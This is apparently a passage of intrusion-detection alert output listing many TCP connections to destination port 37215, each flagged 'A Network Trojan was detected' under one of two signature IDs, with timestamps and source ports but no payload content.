              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200047
              SID:2835222
              Source Port:37562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611738
              SID:2835222
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607760
              SID:2829579
              Source Port:59274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973238
              SID:2835222
              Source Port:50908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554155
              SID:2829579
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510021
              SID:2829579
              Source Port:39840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248044
              SID:2835222
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379336
              SID:2829579
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417751
              SID:2829579
              Source Port:35030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833977
              SID:2835222
              Source Port:34280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154950
              SID:2829579
              Source Port:54216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629201
              SID:2829579
              Source Port:48264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210596
              SID:2829579
              Source Port:35616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379980
              SID:2835222
              Source Port:59062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195961
              SID:2835222
              Source Port:44070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484604
              SID:2829579
              Source Port:36982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547499
              SID:2829579
              Source Port:53708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440957
              SID:2835222
              Source Port:57130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097377
              SID:2835222
              Source Port:44470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724818
              SID:2835222
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821069
              SID:2835222
              Source Port:40210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058557
              SID:2835222
              Source Port:39454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353828
              SID:2835222
              Source Port:36540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457805
              SID:2835222
              Source Port:53968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487139
              SID:2829579
              Source Port:42836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158116
              SID:2835222
              Source Port:34906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974480
              SID:2829579
              Source Port:53766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055955
              SID:2835222
              Source Port:57236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301262
              SID:2829579
              Source Port:38492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197560
              SID:2829579
              Source Port:40352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315960
              SID:2835222
              Source Port:57948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757293
              SID:2829579
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679625
              SID:2829579
              Source Port:60314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972328
              SID:2835222
              Source Port:33894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419782
              SID:2829579
              Source Port:34170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869718
              SID:2835222
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913377
              SID:2835222
              Source Port:38194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676286
              SID:2829579
              Source Port:46140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370139
              SID:2829579
              Source Port:38998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836941
              SID:2835222
              Source Port:59872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695492
              SID:2835222
              Source Port:49954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212300
              SID:2835222
              Source Port:44530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374982
              SID:2829579
              Source Port:34806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402348
              SID:2835222
              Source Port:48174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102145
              SID:2829579
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822613
              SID:2829579
              Source Port:53816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091503
              SID:2835222
              Source Port:47784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373289
              SID:2829579
              Source Port:53124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276461
              SID:2829579
              Source Port:40344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677085
              SID:2835222
              Source Port:51404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488750
              SID:2829579
              Source Port:46392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629257
              SID:2835222
              Source Port:57420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679755
              SID:2829579
              Source Port:48362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727744
              SID:2829579
              Source Port:60774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013228
              SID:2835222
              Source Port:47696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889712
              SID:2829579
              Source Port:33224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273504
              SID:2835222
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048149
              SID:2835222
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610803
              SID:2829579
              Source Port:47962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573382
              SID:2835222
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971541
              SID:2829579
              Source Port:42666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941623
              SID:2829579
              Source Port:40422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421368
              SID:2835222
              Source Port:47254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508321
              SID:2829579
              Source Port:56090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573678
              SID:2835222
              Source Port:35120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566186
              SID:2835222
              Source Port:39520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546633
              SID:2835222
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695385
              SID:2835222
              Source Port:39258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308303
              SID:2829579
              Source Port:34478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403773
              SID:2829579
              Source Port:38576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156371
              SID:2835222
              Source Port:35516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276329
              SID:2829579
              Source Port:41382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884660
              SID:2835222
              Source Port:56120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222661
              SID:2835222
              Source Port:60724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671857
              SID:2829579
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221070
              SID:2829579
              Source Port:58648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724706
              SID:2835222
              Source Port:53604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545514
              SID:2835222
              Source Port:56294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174627
              SID:2829579
              Source Port:58710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889019
              SID:2829579
              Source Port:44848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247564
              SID:2829579
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440167
              SID:2835222
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841622
              SID:2835222
              Source Port:53672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991222
              SID:2829579
              Source Port:48296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100777
              SID:2829579
              Source Port:53090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213255
              SID:2835222
              Source Port:40634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316812
              SID:2829579
              Source Port:37136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089389
              SID:2829579
              Source Port:46254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355657
              SID:2835222
              Source Port:52004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631476
              SID:2829579
              Source Port:58866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279195
              SID:2835222
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437328
              SID:2835222
              Source Port:39378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932798
              SID:2835222
              Source Port:32910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726881
              SID:2829579
              Source Port:51732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503612
              SID:2835222
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174438
              SID:2829579
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301142
              SID:2829579
              Source Port:49994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317684
              SID:2835222
              Source Port:60680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731143
              SID:2835222
              Source Port:35004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168230
              SID:2835222
              Source Port:50914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251564
              SID:2835222
              Source Port:36600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157456
              SID:2829579
              Source Port:42080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346323
              SID:2835222
              Source Port:57866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128236
              SID:2835222
              Source Port:42358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451618
              SID:2835222
              Source Port:41776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820328
              SID:2835222
              Source Port:41334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477331
              SID:2829579
              Source Port:33312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754794
              SID:2829579
              Source Port:55254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638175
              SID:2835222
              Source Port:53846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199352
              SID:2835222
              Source Port:50246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509552
              SID:2829579
              Source Port:35588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971354
              SID:2829579
              Source Port:56056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629584
              SID:2829579
              Source Port:35812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788962
              SID:2829579
              Source Port:60864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175657
              SID:2829579
              Source Port:35752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991349
              SID:2835222
              Source Port:35862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572726
              SID:2829579
              Source Port:58724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016178
              SID:2835222
              Source Port:44162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125786
              SID:2829579
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788674
              SID:2829579
              Source Port:40488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089977
              SID:2829579
              Source Port:35968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242927
              SID:2835222
              Source Port:44996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402269
              SID:2835222
              Source Port:53678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724952
              SID:2835222
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672004
              SID:2829579
              Source Port:48690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837060
              SID:2835222
              Source Port:54076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417559
              SID:2829579
              Source Port:35344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158531
              SID:2829579
              Source Port:57484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107290
              SID:2829579
              Source Port:42010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569406
              SID:2835222
              Source Port:59172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782554
              SID:2835222
              Source Port:35610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158967
              SID:2829579
              Source Port:40326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028977
              SID:2829579
              Source Port:60438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221980
              SID:2835222
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834397
              SID:2835222
              Source Port:58352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547297
              SID:2835222
              Source Port:55598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480605
              SID:2835222
              Source Port:56454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416361
              SID:2835222
              Source Port:34378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820399
              SID:2829579
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.242012
              SID:2835222
              Source Port:58962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357878
              SID:2829579
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440651
              SID:2835222
              Source Port:46734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610282
              SID:2835222
              Source Port:56912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475461
              SID:2829579
              Source Port:55782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457978
              SID:2829579
              Source Port:59764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028599
              SID:2829579
              Source Port:53448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377746
              SID:2829579
              Source Port:53182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212350
              SID:2835222
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731468
              SID:2835222
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422635
              SID:2829579
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755515
              SID:2829579
              Source Port:60614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228511
              SID:2829579
              Source Port:56736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402942
              SID:2835222
              Source Port:49926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379403
              SID:2829579
              Source Port:39096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972151
              SID:2835222
              Source Port:45368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889053
              SID:2829579
              Source Port:57682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422004
              SID:2835222
              Source Port:33958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824616
              SID:2829579
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820543
              SID:2829579
              Source Port:38700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677478
              SID:2829579
              Source Port:41264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822267
              SID:2835222
              Source Port:46454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403226
              SID:2829579
              Source Port:32990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176913
              SID:2835222
              Source Port:50078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832552
              SID:2829579
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153921
              SID:2829579
              Source Port:45744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169182
              SID:2829579
              Source Port:50520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.190991
              SID:2835222
              Source Port:51986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231623
              SID:2835222
              Source Port:42590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549510
              SID:2829579
              Source Port:59602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191342
              SID:2835222
              Source Port:39274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296015
              SID:2829579
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153539
              SID:2835222
              Source Port:41600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613304
              SID:2829579
              Source Port:47746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458730
              SID:2829579
              Source Port:48802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268018
              SID:2829579
              Source Port:53470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884351
              SID:2835222
              Source Port:54792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439544
              SID:2829579
              Source Port:37264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318247
              SID:2835222
              Source Port:36510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277085
              SID:2835222
              Source Port:41070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404176
              SID:2835222
              Source Port:39946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109779
              SID:2829579
              Source Port:48484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123693
              SID:2835222
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307603
              SID:2829579
              Source Port:50936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213420
              SID:2835222
              Source Port:51200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246797
              SID:2829579
              Source Port:59184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305507
              SID:2829579
              Source Port:40042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805437
              SID:2829579
              Source Port:43798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268500
              SID:2835222
              Source Port:46298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176865
              SID:2835222
              Source Port:41034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216868
              SID:2829579
              Source Port:38672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611838
              SID:2835222
              Source Port:53572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634588
              SID:2835222
              Source Port:53128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550025
              SID:2829579
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438592
              SID:2835222
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269043
              SID:2829579
              Source Port:47292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820444
              SID:2835222
              Source Port:54566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180808
              SID:2829579
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
